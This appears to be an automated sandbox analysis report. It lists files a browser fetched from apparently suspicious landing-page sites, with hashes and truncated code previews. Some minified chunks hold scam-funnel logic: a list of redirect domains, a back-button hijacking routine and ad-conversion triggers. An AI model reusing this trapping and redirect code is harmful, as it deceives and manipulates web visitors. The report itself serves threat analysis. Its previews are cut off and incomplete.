                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (384), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):384
                                                                                                          Entropy (8bit):5.774627278458718
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:+hjbdHhjbzriUQ8B0beD9lLjH2LxmPNoiJxHHNaKtNRWvRkSocARq2aWO4mIdiQT:+dbjiUBAehlLDsOCCGsXcARGAdiQT
                                                                                                          MD5:B3D44B4EE2D780508F509806B57EE20D
                                                                                                          SHA1:8E943EF184A66EC02FBA8878611E5C93CD4BA3B5
                                                                                                          SHA-256:D057C51A02934434B40AC112400723B881585B3DF09C5E4C52A3EB96B4BD3C55
                                                                                                          SHA-512:A5497E263C24EA5C0FF96AE2F451FCA1EC5580444F9A87EC624C2704A97FB491DD3DA9D9476DE20BC0920358BE7C9BE5620BC71F255D3148B3FDEF8E0373D7BC
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/chunks/edad189aa37887a4-1736072686539.43e4db17fc3b4987.js
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[11504],{11504:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/m_45.d4b4b23a.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRloAAABXRUJQVlA4IE4AAAAQAgCdASoIAAgAAkA4JYwCdAEf/1PTwCwAAP72fp7mHer4Itmf4+xCr+K2sVD5os/SqJs8P3RKAh8dx1MEVW1EqYa49UkAeCO2KUPAAAA=",blurWidth:8,blurHeight:8}}}]);
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (48323), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):48323
                                                                                                          Entropy (8bit):5.574702440892877
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:uYs+uOrz9/Jlu4V5n9zb3keFEUTqKi6VWelLzEXi7MXo0rQy01/DPQB3QEg/7m27:uYs+/l9jEgxNouJ
                                                                                                          MD5:7841091545F4D1A4CA806F94BB470E51
                                                                                                          SHA1:1E33DB39DAE7AD0AAAA5E1D1B27FC6B94D83FE7F
                                                                                                          SHA-256:F2B77B085B76A2908C615B41E60DB0B6ADE155FA22F9C1CAF5B2BB3EB89438CC
                                                                                                          SHA-512:F9A9C1058505DC8A33077DBBD4EF290DE51FA87E61B3A00FF7F8DF5CC7C8F4B0B88E38D4A514A02354ABD14F6369EC941BAD88E41CAF6EB386DACE1B82E49212
                                                                                                          Malicious:false
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[15850],{6375:function(n,e,t){t.d(e,{E3:function(){return o},ed:function(){return r},iM:function(){return u}});var r,i=t(98800),a=t(27951);!function(n){n.QUESTIONS="questions",n.PROGRESS="progress",n.FINAL="final"}(r||(r={}));var o=new URLSearchParams(window.location.search).has("showProgress")?r.PROGRESS:r.QUESTIONS,u=function(n){switch(n){case i.I.DARK:case i.I.LIGHT:return a.i.warning;case i.I.NEW_YEAR:return a.i.xmas;case i.I.FINANCE_RATING:return a.i.finalNewFinance;case i.I.FINANCE_RATING_GREEN:return a.i.finalNewFinanceGreen;case i.I.BLACK_RED:return a.i.shadowGreen;case i.I.MONEY:return a.i.money;default:return a.i.warning}}},15850:function(n,e,t){t.r(e),t.d(e,{default:function(){return An}});var r=t(70865),i=t(96670),a=t(66383),o=t(56753),u=t(25237),c=t.n(u),s=t(12139),d=t(93888),l=t(9149),f=t(76435),I=t(41206),p=t(77496),A=t(80795),N=t(98800),E=t(21818),h=t(11133),g=t(97897),x=t(29754),m=t(46889),v=t(48045),
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (26671), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):26671
                                                                                                          Entropy (8bit):5.2722107094697765
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:sv5bZ0z3IcV+NtIVVLuugpbSw2tC9pVCeBo01ALKiol7YACwEbhkX:svtZsIS+NSf6SwT9Vl89bhkX
                                                                                                          MD5:46319DA25B781D320119BB919F754F17
                                                                                                          SHA1:F469C209AC6ECE789AFC95873888DE04B0268EEA
                                                                                                          SHA-256:99199D4C9B8E1653AF1EA901B3F856FE9537A6FF869ABAD68CA5C5F8D253EDA5
                                                                                                          SHA-512:5BCA381AC1DFE97B5EBF0FEFC9C6AF2F2FBDF7F251CFFD56D31B5C18750D6F19D676C257BFF34DBEF92157A803276D9E023ED4D97BA1905928EBF6A6A5FF20D3
                                                                                                          Malicious:false
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[49774],{12139:function(n,e,t){t.r(e),t.d(e,{Children:function(){return $},Component:function(){return i.wA},Fragment:function(){return i.HY},PureComponent:function(){return F},StrictMode:function(){return Tn},Suspense:function(){return G},SuspenseList:function(){return Q},__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED:function(){return Cn},cloneElement:function(){return Pn},createContext:function(){return i.kr},createElement:function(){return i.az},createFactory:function(){return wn},createPortal:function(){return _n},createRef:function(){return i.Vf},default:function(){return Wn},findDOMNode:function(){return Hn},flushSync:function(){return Un},forwardRef:function(){return z},hydrate:function(){return sn},isElement:function(){return Ln},isFragment:function(){return Nn},isMemo:function(){return xn},isValidElement:function(){return Sn},lazy:function(){return K},memo:function(){return I},render:function(){return an
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (15494), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):15494
                                                                                                          Entropy (8bit):5.4047651425312475
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:U+LzcYfx8a1TPtK9Uk7Z0d2qIygsB+sKBeZYfEUOHYQ7/VhMIHjrQAFyrnPkW:VLQ9QTPEU94S+pQZQk7LlHjUAMrnPT
                                                                                                          MD5:246C62A01CA76C5E64B7879C01635219
                                                                                                          SHA1:FAA25C8618C4ADC07D9E2619AA386782D21E2C7A
                                                                                                          SHA-256:E0E4A9F620AF9B0283AD84377BFEDC59EC8091DBED06D8F32F37A59D0CB30721
                                                                                                          SHA-512:1D7B06B904E2CAB0C1002389AAEC5EC31A90CD127B7EED7E8BAE97B4A07D4E4103D102C034469AB7B6302DB3E5D99BEE9A28348792CBBF73982520F10A5C436E
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/chunks/dbb80ba394719d25-1736072686539.0157f5525bb5ad80.js
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[47420],{50656:function(e,n,t){t.d(n,{N:function(){return v}});var r=t(12139),i=t(61656),o=t(83216),a=t(71961),s=t(35147),u=t(21818),c=t(51659),l=t(94397),d=t(19495),f=["coajutoa.com","furgoomi.com","kabortot.com"],v=function(){var e=(0,r.useState)(0),n=e[0],t=e[1],v=(0,r.useState)(!1),p=v[0],b=v[1],h=(0,d.bp)().state,m=h.oaid,w=h.userData,g=h.passParamToParams,y=h.userAgentData,E=w.subId,k=y.data.platformVersion,I=(0,l.k)(k);(0,r.useEffect)((function(){b(function(){var e=navigator.userAgent;return/iPhone|iPad|iPod|Macintosh|Mac OS X/i.test(e)}())}),[]),(0,r.useEffect)((function(){var e=setInterval((function(){t(0)}),1e4);return function(){return clearInterval(e)}}),[]);return{initBack:function(e){var r;if(h.back.isEnabled)if(n>12&&p)(0,a.yN)("initBack: Too much pushStateToHistory");else{var l,d,v,b,w=null!==(l=h.back.historyTimeAmount)&&void 0!==l?l:3,y=null===(r=h.back.zones)||void 0===r?void 0:r.find((function(e){r
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):28
                                                                                                          Entropy (8bit):4.280394654123195
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:WZoSISHmn:WZoSfmn
                                                                                                          MD5:4708D1B37F72B842EFE4238A9825064B
                                                                                                          SHA1:889321990FC6854DD351DF9DE8D41D2C9253BAF0
                                                                                                          SHA-256:10B772A54149F2086265D2CAF0C434B7CABE913BBE3665CB9DE5FAEC5EB2FB7F
                                                                                                          SHA-512:1285F4AEFE4F061D9D53FE96509AD93070843265C306123D197DF3603EEFF92FC6017019410015203B2DF139CC9594E387246D4211EADE320A7E77CCCA6EFDDA
                                                                                                          Malicious:false
                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmdDz6tVOknrBIFDZFhlU4SBQ0G7bv_?alt=proto
                                                                                                          Preview:ChIKBw2RYZVOGgAKBw0G7bv/GgA=
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (384), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):384
                                                                                                          Entropy (8bit):5.851947930162583
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:+hjbdHhjbzrhDU4LtNQ3lLjH99uNoiJxHHNaKtNRWn8RsQTt1XvzatJ7QOqdKwdl:+dbjhAGtC3lLD98CCGshfqXmKwdiQT
                                                                                                          MD5:EAA8AD748168870153C979207374DAC3
                                                                                                          SHA1:209043580D096730DED8478BDACFF18BC0029824
                                                                                                          SHA-256:ED064E621022DCB76F54F8AA2491B798980B4DE77BADC11772E384B189FEC197
                                                                                                          SHA-512:566B8CC263E771FEDFF22739577EAF8DF78B23DDA818D5A91F027BBE3C3AEB1B29752DF94463F75964DB4DC59927BA8BA36BEEFF6477A7C2380A5F6861CD5F8A
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/chunks/1fd69c98394a3b87-1736072686539.8146f5f4d16f0056.js
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[43623],{43623:function(A,t,e){e.r(t),t.default={src:"/_next/static/media/m_20.62b047c4.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRloAAABXRUJQVlA4IE4AAABQAgCdASoIAAgAAkA4JQBOja/h4gItBIiU2YAA/vGojk0uwMOnHhg3U5znwSl3k8IPKHY3YNHpqOLpCyN2WU5k25at69D32W8sm+9kAAA=",blurWidth:8,blurHeight:8}}}]);
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (7077), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):7077
                                                                                                          Entropy (8bit):5.499355571075943
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:Op8BGH5utfaGbPta040v8HSAltggs9iB97ndbgukthsNFiO4VXtPi1k64Xf4b39f:XvLaUYdbrKgFiOAPyb3f1nn
                                                                                                          MD5:F75C7E1547234B30C056BCCA3538AD06
                                                                                                          SHA1:D8FA1FC30878410899B86F0FF1E2491CC812DAFF
                                                                                                          SHA-256:3A416CA22375D5C1855470FA0BA693579AF18C2D089EBBB5A7B945CDA9370774
                                                                                                          SHA-512:28B7F4058851A3666BF837C7C6F164323FBE0857A6E1EC40BB179B63034B4177AC30498E06FBF24F799401262BAA28B9EC506B35486D0D848C2E672BC419C721
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/chunks/8d3443188ef1fee1-1736072686539.437b26541c6a284a.js
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[96950],{2798:function(e,n,t){t.d(n,{d:function(){return b}});var r=t(70865),i=t(96670),o=t(24156),a=t(17969),s=t(71961),c=t(31456),u=t(87722),l=t(97897),d=t(53444),v=t(29754),f=t(19495),E=t(77261),b=function(e){var n=e.isConversionEnabled,t=e.audienceForConversion,b=e.goal,_=e.isAnalyticsEnable,N=(0,f.bp)().state,I=(0,E.M)().syncMetric,C=Boolean(v.H.get("isDisableConversion","session")),S=N.userData,O=N.shouldTriggerConversion,g=N.isWithinConversionTime,h=N.nonUnique,p=N.adex,D=N.iframe,m=N.conversionProbability,R=D.isIframe,w=p.status,y=h.isNonUniqueCross,U=S.subId;return{conversion:function(){if(!function(){var e=Math.random(),t=e<=m;return d.n.conv?((0,s.cM)("Conversion is disabled via URL param",d.n.conv),_&&I({event:l._.CONVERSION_DISABLED_URL_PARAM}),!0):a.yG?((0,s.cM)("Conversion does not get triggered in the dev mode"),_&&I({event:l._.CONVERSION_DISABLED_DEVELOPMENT_MODE}),!0):n?U||d.n.s?O?g?y?((0,s.cM)("User
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (30035), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):30035
                                                                                                          Entropy (8bit):5.3939013260573505
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:bUMojjcKsVnjBHuJaSYhPL2DZRFtPW25HZlcR8SxY9opL5a2OIvfA5GgAy0t5:YMQjfsfHfz2DxpuhUY5ZfAExBt5
                                                                                                          MD5:0E650C6FBDBAEA01C64C59F71ECBE089
                                                                                                          SHA1:75D3AEF97713ED867EB35E87CB91D4A6AD74AC3B
                                                                                                          SHA-256:08800A958EF86E09D5001801F2F8645AE0A14002A8610F38A883B747E73CB544
                                                                                                          SHA-512:063AED16C4678DEB360E29827DB992EB3862CB3DAF0F83BB7CC4D6C7A34EDC0DEF3DE98E94F9EE8063124BDABBA872BEA4336D53BB94039B22C013762BADA64F
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/chunks/3cacc58ea516fe6f-1736072686539.4d666b3ce7dcd66f.js
                                                                                                          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[81658],{88665:function(e){e.exports=function(e,t,r,n){var o=r?r.call(n,e,t):void 0;if(void 0!==o)return!!o;if(e===t)return!0;if("object"!==typeof e||!e||"object"!==typeof t||!t)return!1;var s=Object.keys(e),a=Object.keys(t);if(s.length!==a.length)return!1;for(var i=Object.prototype.hasOwnProperty.bind(t),c=0;c<s.length;c++){var u=s[c];if(!i(u))return!1;var l=e[u],f=t[u];if(!1===(o=r?r.call(n,l,f,u):void 0)||void 0===o&&l!==f)return!1}return!0}},93888:function(e,t,r){"use strict";r.d(t,{f6:function(){return Mt},vJ:function(){return Vt},iv:function(){return Ht},ZP:function(){return Jt},F4:function(){return Kt},zo:function(){return Jt}});var n=function(){return n=Object.assign||function(e){for(var t,r=1,n=arguments.length;r<n;r++)for(var o in t=arguments[r])Object.prototype.hasOwnProperty.call(t,o)&&(e[o]=t[o]);return e},n.apply(this,arguments)};Object.create;function o(e,t,r){if(r||2===arguments.length)for(var n,o=0,s=t.length;o<s;
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:HTML document, ASCII text, with CRLF, CR, LF line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):490
                                                                                                          Entropy (8bit):4.9429203664368515
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:hPIz+VtZA+OCy/XCEqsHyeAbfVJAb9hqAErfiBnPGu:hPIzWvCLHlyfVJy9h7EM
                                                                                                          MD5:92D0A62DC2EE6783157335737ED7091D
                                                                                                          SHA1:622441308321A7B3D0091ABE4A2309BA501DFC3B
                                                                                                          SHA-256:A3CAC0E0EE68803201E75DC10D32ACC33A76ECFD0BA7ECD2CCB006422F1B8CDB
                                                                                                          SHA-512:137C7FC4B2CD2CD0B745A255878AC0AED18482C00EE94980D3A1C752528705E1F1EEC38465E873D0ACC61283401EB06C67C81BF05073D279111956446A00D577
                                                                                                          Malicious:false
                                                                                                          URL:https://bohlepropiedades.com/includes/3z6r2I6C42020J
                                                                                                          Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="UTF-8" />.. <link rel="icon" type="image/svg+xml" href="/includes/vite.svg" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Home</title>.. <script type="module" crossorigin src="/includes/assets/index-qoqlwAed.js"></script>. <link rel="stylesheet" crossorigin href="/includes/assets/index-B_awNbnU.css">. </head>.. <body>.. <div id="app"></div>... </body>..</html>..
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (380), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):380
                                                                                                          Entropy (8bit):5.857155687155353
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:+hjbdHhjbzrqcAiTebeD9lLjUwPuNoiJxHHNaCHZRsU5WEzfj8LbhJ9ldiQLf:+dbjqcAHbehlL4GuCCGc/Ibz9ldiQT
                                                                                                          MD5:03B02FA3434BB49AAB7CE7ACD2FFE7AD
                                                                                                          SHA1:E293B8C55DE4D50C71A84D47F6EA7D1C6C6BB6D9
                                                                                                          SHA-256:59C74603A6DAFD22E1BC494CE75612F60550617251B6C880FE6EC3964CA2EED4
                                                                                                          SHA-512:2EA597EF9C308F366D0955DAFC21D47CADE3D066793FD07BABDCEBBAF31E8BBE6F1E4B291CFA05864F47DAF0A635287B94DF68FFEB46D6FD17B9EE27C9A7A613
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/chunks/593553c1eec4cbba-1736072686539.97c2038dc0b2daf0.js
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[99600],{99600:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/f_24.a0b04b39.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlgAAABXRUJQVlA4IEwAAAAQAgCdASoIAAgAAkA4JQBOgMVL7Mnic2OgAOJ0k+TkggES2qW+TBPwWjNoQTV8mUodM7SvxOkARirM66MMRbzVOZcUEpHUoEd8AAAA",blurWidth:8,blurHeight:8}}}]);
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):160
                                                                                                          Entropy (8bit):5.090984031481258
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:k0WYL12AoJTRXCGW045A9CNo06yBMfOVB+MB44W6QfpX/W6Qen:UYR2AUTRMPArYH46EpXO6h
                                                                                                          MD5:D7C1624B8C3C5724789430E3EE0F99CD
                                                                                                          SHA1:F537B81DFB15B4B4C8C48EDB112CA607563AE8E0
                                                                                                          SHA-256:3064462069623E8EE6A6F553B03B85AF446F6A83797C5B7DF5AB4745B3E7DAC1
                                                                                                          SHA-512:F4C6DBD513B6165E515DF0654A8D9D91F42DC6B6BC4100EF8174BDA8211A48F13319B8A51C98F0EBCAF5D07C634E3D1E20337DD8521C679102548ADE5A2B8274
                                                                                                          Malicious:false
                                                                                                          Preview:self.__SSG_MANIFEST=new Set(["\u002F[landingName]\u002F[configId]\u002F[[...slug]]","\u002Farticle\u002F[id]"]);self.__SSG_MANIFEST_CB&&self.__SSG_MANIFEST_CB()
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (6289), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):6289
                                                                                                          Entropy (8bit):5.397253576176072
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:K7U1UoImHvbQ8FfXZ0Y92uZ2Dwi3oP8hQwDIRwy1GLFgKZVzYMeIfIa:EulImU89pci2ceoEawsR9MLFhoGQa
                                                                                                          MD5:D6DE2B1FC854FE26AA50F2BA1B6C2F3C
                                                                                                          SHA1:080C6ECE45CD4D8C3FD70975166F345DD823B65A
                                                                                                          SHA-256:8EC41CDFF13D0E98B23AB477F2CB80AA0576B2E0F37CE1AC9A30608562209D0D
                                                                                                          SHA-512:3D49B5765ACD16CAF6DDB1A0DF39815F3F8AF70F40B28DD60FA41B756A6D1E77AA92D87146D4FF511697BAECE465316F1C286EB59F5ECB2B4F793AFA90A4261D
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/chunks/946b720792ec3642-1736072686539.5fb83dbc00ce11a5.js
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[68249],{43601:function(n,e,i){i.d(e,{N:function(){return r}});var t,o=i(29505),r=function(n){return parseInt(null!==(t=(0,o.ej)(n))&&void 0!==t?t:"0",10)}},50656:function(n,e,i){i.d(e,{N:function(){return f}});var t=i(12139),o=i(61656),r=i(83216),a=i(71961),u=i(35147),s=i(21818),c=i(51659),l=i(94397),d=i(19495),v=["coajutoa.com","furgoomi.com","kabortot.com"],f=function(){var n=(0,t.useState)(0),e=n[0],i=n[1],f=(0,t.useState)(!1),N=f[0],U=f[1],b=(0,d.bp)().state,E=b.oaid,k=b.userData,h=b.passParamToParams,_=b.userAgentData,p=k.subId,m=_.data.platformVersion,w=(0,l.k)(m);(0,t.useEffect)((function(){U(function(){var n=navigator.userAgent;return/iPhone|iPad|iPod|Macintosh|Mac OS X/i.test(n)}())}),[]),(0,t.useEffect)((function(){var n=setInterval((function(){i(0)}),1e4);return function(){return clearInterval(n)}}),[]);return{initBack:function(n){var t;if(b.back.isEnabled)if(e>12&&N)(0,a.yN)("initBack: Too much pushStateT
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1150
                                                                                                          Entropy (8bit):2.3031661149070852
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:XVl/F/1/l/9ur/xr//r/TCr/cr/cr/cpDQgP:Xn/F/1/l/9s/h/T/s/e/e/QQs
                                                                                                          MD5:91ABE01116AB422C598E9C8AF72CF4DA
                                                                                                          SHA1:0F2815FE8E067D48537AD168225AB4674271FA27
                                                                                                          SHA-256:B1D7AEF06456FE7431124129A28F0138BB5FCCFA4F4161E3087DE23C005E5EDC
                                                                                                          SHA-512:A4D5B20C3014153B6B382C43404917BD2CB5BD2A59BB1E981F5A19EB7DBDEC185ACE288E9700428D24E5AC623E45D04905E706F0C45A1642B1AA6C091213C23C
                                                                                                          Malicious:false
                                                                                                          Preview:............ .h.......(....... ..... .............................................................................................................H.?8........................................................I.@.I.A.H.Ai................................................I.@.I.A.I.A.I.A.H.Ai........................................I.@.I.A.I.A.I.A.I.A.I.A.H.Ai................................I.@.I.A.I.A.I.A.I.A.I.A.I.A.I.A.H.Ai........................I.@.I.A.I.A.I.A.I.?.I.A.I.A.I.A.I.A.I.A.H.Ai....................I.AyI.A.I.A.I.?.G.@K....I.AeI.A.I.A.I.A.I.A.H.Ai....................H.@{I.?.G.@K............I.AeI.A.I.A.I.A.I.A.H.Ai....................F.?$....................I.AeI.A.I.A.I.A.I.A.H.Ai............................................I.AeI.A.I.A.I.A.I.A.H.Ai............................................I.AeI.A.I.A.I.A.I.A.H.Ai............................................I.AeI.A.I.A.I.A.H.A.................................................I.AeI.A.H.A...............................................
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 512x512, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):11538
                                                                                                          Entropy (8bit):7.984598747046537
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:WIw44ijvzyidmzKFJNYRT5z+kwLdgynPzbZa8oKqH2YAfyo:WKZXdmzuYd5zRwLdgynPzbpJdao
                                                                                                          MD5:68950CD855A61C301BA41707C59EA156
                                                                                                          SHA1:35F8245D53B1730E8A459790B0F8EE62305D5FBB
                                                                                                          SHA-256:3F6E916F1EF04A96FC8164A37E74B307B70D1A54211DAB05BD75F70C86EAC2E3
                                                                                                          SHA-512:01A23B0468EA976A365E8077DB02AD699F60730AE0260612E6FE205A21C8D610ADFA652B052B0F772301D094C2A08143B7E94BA6C875DEB57DF93BFAC9AD9B72
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/media/m_13.99d105c0.webp
                                                                                                          Preview:RIFF.-..WEBPVP8 .,..0....*....>m2.F.#!.-s.....g@.i.nW.....%..BJ7W....k......*.5.......oD.......a.....=.;........M.F.%.(.u.......;.....?..........W.B&.^.f............c.?...}+...?.9xz..~...fC.O.o@...../.Q.w.......]x.........".Wb.._B.[ ..EYtCkv.(4...d$s.k!~..8.~!../FL'.T.S.....Q.....i'.....z.X.RA.o..P.....z.t.w./...VwTY.Kp..Hr./E.l.|..'.c.....Qs....7.=vQn.?d..6G..u..d.d....7 ..=.%..u.e......4..g..l.<l...cYR...R.).0......f.V.....`.5Dy<;'a.F&"*..{.v..M[.8F..;..t'."..$...25.....).u....G5f}...Y...C.S....IO.q..v.j".R.J..5..Zv.O..<.}.J:.N......yl1.........{......W...Js..j\0Fo4j.6...G...7&\......9Q...!.?.u-....Mk.YS..F44q...V.K.[%GM.....<.8....Hr(H..$......G..Q.'Lx..W..P^.....K...C}.....].....'+j....vP..p/A..;..%.}...r..............^.D....-..J*....Y.{-...r..R]q...i...X..r....l[V.IGhD....L=..)..w........q?c9..q_.....]m....A.....]....$.$..C%..kmf.....+t.......Zl..=.@0..GI..)t..p.J2g...Q......7t....#...e.vE..L..v...j..I...!K/.U.Z..QX(L.!......O.J.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (564), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):564
                                                                                                          Entropy (8bit):5.265637059621039
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:+dbjqQaT7FZovvKOR06x/MRX+Rfd1MYMLImH9M4yb6Y1dTJn:ibjGT7GvKOCYIXGfEVHWd6IdT9
                                                                                                          MD5:C45318362185A0B90E2DEBF5AF50CEE8
                                                                                                          SHA1:C9D8D22169DFC142151A18117F9E8FB148D78DF7
                                                                                                          SHA-256:AD1EFCDCD1133EDD03BE157D2B3C174238D8B4C6DCF347C5677CCB4E2C49DD5A
                                                                                                          SHA-512:E87C9F4FC3CD6928FE7205C34687846A6176EA04BE0F690234B20A293D7C2143E4BAEFCBDE11FC7F169442D1402E763DC03C0524CEFEEB70CE68E9E07220B45C
                                                                                                          Malicious:false
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[95491],{95491:function(n,e,r){r.r(e);var t=r(92228),c=r(93888);function o(){var n=(0,t.Z)(["\n place-self: center;\n height: 40px;\n width: 100%;\n max-width: 300px;\n border-radius: 5px;\n display: flex;\n align-items: center;\n justify-content: center;\n color: #212529;\n background: #ffc107;\n border: 1px solid #ffb306;\n &:hover {\n color: #212529;\n background: #e0a800;\n border-color: #d39e00;\n }\n"]);return o=function(){return n},n}e.default=(0,c.iv)(o())}}]);
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (7033), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7033
                                                                                                          Entropy (8bit):5.435337343313622
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:xjpI6Vkux5lqZ5XKCGklxWKwcKcZpyRv/vt57EYQcG:xlIfunlqZhKCG88Kwc7byRntNErcG
                                                                                                          MD5:0423E9F04482FB5515F7847EAD11974C
                                                                                                          SHA1:0C68534F158D022AA558877A2822591CCAD45A05
                                                                                                          SHA-256:5AEE159618A68108C36F251495310DDD1380C4C9055C727B8B723C297A113F67
                                                                                                          SHA-512:B5D872F70130AB40C74F4034F96A4912D05643B31CFE0056F65594969FB5C4FB378EB57DEAC55ECBC11C2DD33C7494D2FABECB956EFCC743FBAD9E716425C1C1
                                                                                                          Malicious:false
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[47081],{47081:function(e,r,a){a.r(r),a.d(r,{default:function(){return A}});var s,t=a(70865),n=a(96670),c=a(12139),i=a(54983),o=a(60838),u=a(47747),l=a(71961),d=a(25869),f=a(53444),p=a(19495),k=a(95798),_=a(98788),b=a(42838),v=a(22970),h=a(17969),y=a(97897),m=a(77261),D=a(34406),R=a(66383),P=function(e){var r=e.searchParams,a=e.params,s=!0,t=!1,n=void 0;try{for(var c,i=Object.entries(a)[Symbol.iterator]();!(s=(c=i.next()).done);s=!0){var o=(0,R.Z)(c.value,2),u=o[0],l=o[1];void 0!==l&&null!==l&&r.set(u,l)}}catch(d){t=!0,n=d}finally{try{s||null==i.return||i.return()}finally{if(t)throw n}}return r};!function(e){e.ZEYDOO="ZEYDOO",e.OFFER_PANEL="OFFER_PANEL",e.APPLAB_ZEYDOO="APPLAB_ZEYDOO"}(s||(s={}));var O=function(e){var r=e.oaid,a=e.osVersion,t=e.isAnalyticsEnable,n=e.aliasId,i=e.isApplabRedirectless,u=e.isRedirectless,d=e.isOfferPanel,p=(0,c.useState)(null),k=p[0],R=p[1],O=(0,c.useState)(null),A=O[0],I=O[1],E=(0,c.useS
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (6307), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6307
                                                                                                          Entropy (8bit):5.366726448460751
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:nJsRnsIpHRXiQSljUcOKakHv5ITuRI/hvu1LNZbojnMf:JsRpRXipwE1RD
                                                                                                          MD5:7760D1AA9B70AA37FBCC5479F8E7EB98
